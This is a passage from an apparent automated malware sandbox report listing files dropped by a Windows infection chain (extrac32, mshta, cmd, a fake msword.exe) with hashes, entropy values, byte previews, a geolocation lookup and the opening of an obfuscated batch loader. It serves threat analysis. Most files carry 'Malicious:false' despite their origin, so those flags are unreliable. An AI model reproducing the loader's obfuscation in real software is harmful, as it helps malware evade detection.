                                                                  SHA-256:29B9FA04343B577FFB55491F820A6D1978230072AE4752AD42836CF0581CD5E2
                                                                  SHA-512:179561473340EB92A5BCAFE243217D9C8158572239294DDF45CB0FBDEF0EBAE1B07863C631CE7BFB983F65F627268300812EB38AAABCBA3CFF90F5D014C06754
                                                                  Malicious:false
                                                                  Preview:.Zhz.&..N.......B.z..si.....u...4A[.F.A.$...O..Y....]..3&M.p%.?.>Z..O.q..$X...KuS.a.C.....(J..#.f...k.c...0..o0.L..,..2k.Lc.x."........0...X...Q..Ix...Ep...y*w..1...V.~........h\pK3m ........(h..|.gp....@..:.O.K.....(...v..s.{.{..wz..].fh..j.8}}..F95..T...pX.............)j?.....%.Q"....{.#}..,dz......]d%..... .K..z#..{C.B......Z.....j{.u;..Yhl...[...T.80.y<dc.2IHG..8......1..x.....pF.%. ....f5>.CT7.}.."....<...4E.k.m.......o.....\G.y.WK[|.."}...E...../.$.......d.|..X.-^.d.F"..".W..(..<.........HQ............M!c......?*Z32.>.$.._.yR...\.-.=O.p.x...y.z.E...._.a/6..Q...3...QG..P.kQ2...FU.!$.)..ve.......N...B..j.{..`...Q.t ..;.\.J!O F.3..o1U....*.4gJ.U.N....x.I 9C3..V....Z.../..u.",.J.q..Q'l.o...h ....V>m...d..._.d...V..-.H..H..Pw....M...b.-9...cgV.b..._...D.a....x.V....y^..Yaq...#......-"q....0v7.dB....T.!.........d,.)u.....Y...P^.p....]sX.(."..A.ky1..SFK..G..G^.p..#.8c.q.....~....{.d..b......l..o...Q......l..G.g.t9}....Q....`...KX.
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144384
                                                                  Entropy (8bit):6.494296209067955
                                                                  Encrypted:false
                                                                  SSDEEP:3072:5dgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQw:LgQaE/loUDtf0accB3gBmmLsiS+w
                                                                  MD5:57BB8B206C43DDE57D7066A4DEDB272C
                                                                  SHA1:E3B400206A6D3C7C5885CB56BFCAB82220BB110A
                                                                  SHA-256:821735E47ECA9D213B65D12878DCA3D3EC620B5FE0555F0BD3B73EEE459A6D4F
                                                                  SHA-512:C5E0C68E27CFC9705178C261FC617EAC27D745CDF93F88D01A49D3025AD7025038FB8DB5FA36D96089D4410BB965E9163282A99A0D6EAE40ED6783AF6C5BD074
                                                                  Malicious:false
                                                                  Preview:..F...................E....;E...MN..;...EN.........H......T...$.P*A........x...........U...E.....M...E.....;E...NK..;...FK.........[.......v.......[..h.........O.......W....O...............................O...7...........%....v..0...Hj....~.............F..F.@....#O........3.F...............Q.w....N.....E...M....Q.6P.s....M...............G..X........[............S........S............S........R.......w....R........R.......d............v..........R...7...........F............_^3.[..]........BN.......W...<N...........=.....................2.....F........H..........$.x*A....c.......Z...;...|....N......u........P..................S.......*A..$..*A......V.......1....7........u...S...l....q...........h....$..*A....N...V...]....M...H..........$..*A.....f...s..].....f...C.j..v..6.p..0.j.......................................+..M......+....M..E....u....;...AJ..;...9J...}....T......Vf...v....Lf...C.j..v..6.p..0........'........Q......F..........Q......F.........
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):56320
                                                                  Entropy (8bit):7.996610067500435
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Uq7NUVrVpkmRwRjr3psvmpMfmPO6rpciGjMzjM:UKNUVrkRRGm1PO6mj4M
                                                                  MD5:583A66DF71B30CE556F3F5131162AA1C
                                                                  SHA1:0594EF5DF9510410B520282D9C833D604969865A
                                                                  SHA-256:83A055C80F22D870C163A6ABC49664C8A9F8D14CB9CDB11DFBCB70AD72191D4C
                                                                  SHA-512:3939472BA5061896D4F8E0F1F97ED34B52D32F5D27DA41FC5C92EF73653482102349AF607F327B15B13FD208C970B95DBB3B714332FF1D58CFDFF25C0C1C4C3A
                                                                  Malicious:false
                                                                  Preview:J.....9.b......h....=<.5}.^U....}./.L.k6nz....Q..7z3.c..... 2..b8..c.a...C.....2y.(.0..-...S....8....o,.T*.&.c..G. .....q.B..Sf..........M....m.A|..S.N.:....?0R*....$*:...........q.q.!.F....T..h.....d.s...fR.+\1.[+o.;u..u..{g<.......4.f..w..-..._.Q....yT.<L..h.G.j...._@.9c;sT.....<...-k.1..NW....1q..?.KZ...u.........{?....?..pl.-...|..O,f)q.oZ.=....G..2..5,q.\.......H%..+......N..Z...h.......t.{.m..6.d....3.Y..9........w...e.\";.;.!...S..[...........t.;..Ek.c_`....+."...Q._?[.1 ..d...]....6..Y.v.qh...Ss!...v.$..H........f.....?.a*.\..R.-.w....b.1..g..yJL...)...A*J.>JYl:.[m....{^...<.G..M.4A.W...J..yd.Y..s....V..V.p..d...r..`....p..S.@.p..c.M....."D~.J.C.].R...j......*J..F.o.s#...Nq..V...`..t/........v.p2B.Z*6....=.A...4S,...R.e...F.6..e.Q.y.>..O...e.%..~....tj....|.e.$.j9%.[[..x9w.G..g.`.....^.p.I.f......k.4....%..9....nnz...3_fy..|..a..@6.C.,.P.....V...d..P..Fn.. ...B....Zs....inB<...&..5c....B...w)S.....E@2..%....b.l-.l
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70656
                                                                  Entropy (8bit):6.548010857173451
                                                                  Encrypted:false
                                                                  SSDEEP:1536:V1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdz:VZg5PXPeiR6MKkjGWoUlJU5
                                                                  MD5:56BB83409EE3E1A9DDF64E5364CBAAF6
                                                                  SHA1:C3DA7B105A8C389BE6381804CB96BB0461476E39
                                                                  SHA-256:D76B1AAACC225CD854E0EC33C5268C02824EE4A1120B5217916C24D23E249696
                                                                  SHA-512:59D1D8C1C613F89CBAA8B5C242CEA4889BA8F8B423D66598C5ED3A26FD82752A9CA0742C1ED932B3A1FBEDB5B8701AB6321C35E9DDE5A801625350CFF7990AC6
                                                                  Malicious:false
                                                                  Preview:U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0........
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):137216
                                                                  Entropy (8bit):6.481339286025911
                                                                  Encrypted:false
                                                                  SSDEEP:3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
                                                                  MD5:1CB233987779B587705687B7D8F66A01
                                                                  SHA1:5F33D543C24701D370072BB4E77E4A8D058AE035
                                                                  SHA-256:48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
                                                                  SHA-512:56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
                                                                  Malicious:false
                                                                  Preview:.j.....I......u0..$.I....Q..|....L..t..I8.A..|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..|:...L:.t..I8.A..|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..|1...D1.t..@8.H...|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..|1...T1.t..R8.B..|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..|....T..t..R8.B..|....D..t..@8.@.....>_^3.[]...U
                                                                  Process:C:\Windows\SysWOW64\mshta.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (904), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5541
                                                                  Entropy (8bit):5.2664681958555635
                                                                  Encrypted:false
                                                                  SSDEEP:96:CincTy8G+hpQyuPmhDGEhtKCZ+CdvloxEWaqNh3b3Z/OnSZtn5+Gs8HNSqCBXAyY:CincTy8G+hpQyuPmhDGEhtKCLCjaob39
                                                                  MD5:30F0E17A1AD41BCDC9A52049E5DA1884
                                                                  SHA1:FE3996616238A93B458232F693D8A4FE654C66C3
                                                                  SHA-256:7C8949DBD5C68356292318F49EEC561EAFF17E4056101AFA945176F4C9E46398
                                                                  SHA-512:8FE9485BC6DABB862BDC315C980C9E58D9A49D4BD5D616B12C870A5342718544E6ED00D3041787E1C21CD614A968DAF45C3D145742CA768AD49BFA546886D6C7
                                                                  Malicious:true
                                                                  Preview::: .... ... ......... ...... ... .. ...... ... .. ......... ... ....... ..:: ....... ...... . ... ...... .. .... ...... . .... ......... . .... .... .....:: .... ...... ... . .... ..... . ......... .... ................ .... ... ....:: ...... .......... .... . .... ....... ... . ...... ... ....... . .... .... ...:: ... ... .. .... .... . . ..... ......................
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):963
                                                                  Entropy (8bit):5.019506780280991
                                                                  Encrypted:false
                                                                  SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzd:qlupdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                  MD5:7459F6DA71CD5EAF9DBE2D20CA9434AC
                                                                  SHA1:4F60E33E15277F7A632D8CD058EC7DF4728B40BC
                                                                  SHA-256:364A445C3A222EE10A8816F78283BBD0503A5E5824B2A7F5DCD8E6DA9148AF6A
                                                                  SHA-512:3A862711D78F6F97F07E01ACC0DCB54F595A23AACEA9F2BB9606382805E1E92C1ACE09E1446F312F3B6D4EE63435ABEF46F0C16F015BD505347A1BCF2E149841
                                                                  Malicious:false
                                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):74752
                                                                  Entropy (8bit):6.557400918137722
                                                                  Encrypted:false
                                                                  SSDEEP:1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
                                                                  MD5:15BE985957A02EE4B7D96A3C52FF0016
                                                                  SHA1:B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
                                                                  SHA-256:E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
                                                                  SHA-512:9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
                                                                  Malicious:false
                                                                  Preview:.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90112
                                                                  Entropy (8bit):6.7085176792029815
                                                                  Encrypted:false
                                                                  SSDEEP:1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
                                                                  MD5:7FC8AB46CD562FFA0E11F3A308E63FA7
                                                                  SHA1:DD205EA501D6E04EF3217E2D6488DDB6D25F4738
                                                                  SHA-256:5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
                                                                  SHA-512:25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
                                                                  Malicious:false
                                                                  Preview:.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):147456
                                                                  Entropy (8bit):6.70232349488191
                                                                  Encrypted:false
                                                                  SSDEEP:3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
                                                                  MD5:C038EEFE422386831ACF8D9D6898D464
                                                                  SHA1:9CF7F3E9A50218D5E03617B793EAE447645E6A90
                                                                  SHA-256:1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
                                                                  SHA-512:8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
                                                                  Malicious:false
                                                                  Preview:J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):61440
                                                                  Entropy (8bit):7.997097243867807
                                                                  Encrypted:true
                                                                  SSDEEP:1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
                                                                  MD5:838511D6727BE6237C1E4CD26A0885DE
                                                                  SHA1:7A9FFA35532A5817F04CB48C9E154B5C9DE74623
                                                                  SHA-256:D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
                                                                  SHA-512:AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
                                                                  Malicious:false
                                                                  Preview:.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL.*.s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.*pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.....*....Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e.*..>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):76800
                                                                  Entropy (8bit):7.997538946660952
                                                                  Encrypted:true
                                                                  SSDEEP:1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
                                                                  MD5:7B5C9E82025D184E64A7413174CE1A1C
                                                                  SHA1:C552965CE73D43225541932D65C3B4B6342A70E4
                                                                  SHA-256:7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
                                                                  SHA-512:71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
                                                                  Malicious:false
                                                                  Preview:/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>..*..a.d..}.N*.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1237
                                                                  Entropy (8bit):3.752009061763574
                                                                  Encrypted:false
                                                                  SSDEEP:12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
                                                                  MD5:47FE88841F7CEA67286B6BB812A7A09F
                                                                  SHA1:950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
                                                                  SHA-256:33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
                                                                  SHA-512:C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
                                                                  Malicious:false
                                                                  Preview:Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\extrac32.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):70656
                                                                  Entropy (8bit):5.9158452815608795
                                                                  Encrypted:false
                                                                  SSDEEP:1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
                                                                  MD5:E6FE42ADC3082D12E845756426492B6E
                                                                  SHA1:E1170EE049AB607162D1495B625AA74221AA8585
                                                                  SHA-256:BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
                                                                  SHA-512:9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
                                                                  Malicious:false
                                                                  Preview:...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):98304
                                                                  Entropy (8bit):7.9979666143694095
                                                                  Encrypted:true
                                                                  SSDEEP:1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
                                                                  MD5:52C875EB8A3EBC4643094465CDBB08D0
                                                                  SHA1:013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
                                                                  SHA-256:A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
                                                                  SHA-512:97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
                                                                  Malicious:false
                                                                  Preview:....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.....*....,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{|.8.L.o;,.V...vC...B.p.X(T%..q..T..z....*......M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[.*.I...?.v.tfJ..9....+..*J.....g.....g.WK.....\
                                                                  Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
                                                                  SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                  MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                  SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                  SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                  SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                  Malicious:false
                                                                  Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23449
                                                                  Entropy (8bit):5.134148367041093
                                                                  Encrypted:false
